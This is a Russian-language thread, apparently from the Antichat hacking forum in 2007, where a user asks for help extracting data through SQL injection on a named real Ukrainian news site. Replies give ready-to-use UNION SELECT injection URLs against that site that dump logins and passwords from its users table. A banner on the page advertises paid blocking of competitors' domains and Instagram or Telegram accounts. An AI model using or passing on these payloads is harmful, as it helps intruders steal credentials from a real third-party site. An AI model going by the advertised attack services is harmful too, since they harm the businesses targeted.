sql-inj запросы

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
sql-inj запросы

Опции темы

Поиск в этой теме

Опции просмотра

sql-inj запросы

20.04.2007, 13:06

muse

Новичок

Регистрация: 25.09.2005

Сообщений: 29

С нами: 10854458

Репутация: 9

sql-inj запросы

есть сайт с уязвимым параметром page.php?id=35167

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом

прав на запросы к msql. нету
прошу помощи у профов

𝕏 Twitter Reddit Telegram Копировать ссылку

20.04.2007, 13:17

limpompo

Познавший АНТИЧАТ

Регистрация: 27.08.2005

Сообщений: 1,662

С нами: 10897046

Репутация: 1329

поищи таблицы user user admin admins members и так далеее

Кароче займись подбором Таблиц и колонок....

20.04.2007, 13:25

muse

Новичок

Регистрация: 25.09.2005

Сообщений: 29

С нами: 10854458

Репутация: 9

вы непоняли вопроса.
я немогу вытащить оттуда инфу
например есть таблица users и в ней есть параметр id
но запрос union select 1,id from users ничего не выдает...

20.04.2007, 13:41

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Линк дай.
Млять какой же народ пошел.

20.04.2007, 13:50

muse

Новичок

Регистрация: 25.09.2005

Сообщений: 29

С нами: 10854458

Репутация: 9

http://daily.com.ua/analytics/page.php?id=35167

20.04.2007, 13:51

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

С нами: 10243046

Репутация: 3033

Помойму иньекция на этот сайт проведена кем то из наших, во всяком случае в антибояне линк есть

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

20.04.2007, 14:30

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,2/*

20.04.2007, 16:41

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

С нами: 10957346

Репутация: 2727

Цитата:

Сообщение от [ cash ]

http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*

втф? либо я слепой, либо лыжи не едут, но вывода в упор не вижу.

Цитата:

Сообщение от muse

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом

http://daily.com.ua/analytics/page.php?id=3516+and(1=-1)+union+select+concat(login,char(95),password),6+ from+users/*

__________________
ПИУ-ПИУ...

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters	bxN5	Forum for discussion of ANTICHAT	1	09.04.2007 19:07

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules